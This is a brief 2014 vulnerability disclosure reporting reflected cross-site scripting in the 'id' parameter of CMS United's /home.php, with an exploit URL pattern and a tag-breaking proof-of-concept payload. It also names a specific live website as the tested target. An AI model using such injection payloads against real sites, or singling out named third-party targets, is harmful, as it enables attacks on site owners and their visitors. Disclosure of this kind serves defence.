CMS United suffers from a cross site scripting vulnerability.
c2a2ddf01cac17429386e56f8a4e8aa5d000c4d608d1954ca2ca1629f76bfaa7
# Cross Site Scripting on CMS United
# Risk: Low
# CWE number: CWE-79
# Date: 09/04/2014
# Vendor: www.cmsunited.com
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: /home.php
# Exploit: https://host/home.php?id=[xss]
# PoC:
- Target: www.ralphvanmanen.nl
- Vuln. File: /home.php?id=
- Exploit: "><marquee>Vulnerable</marquee>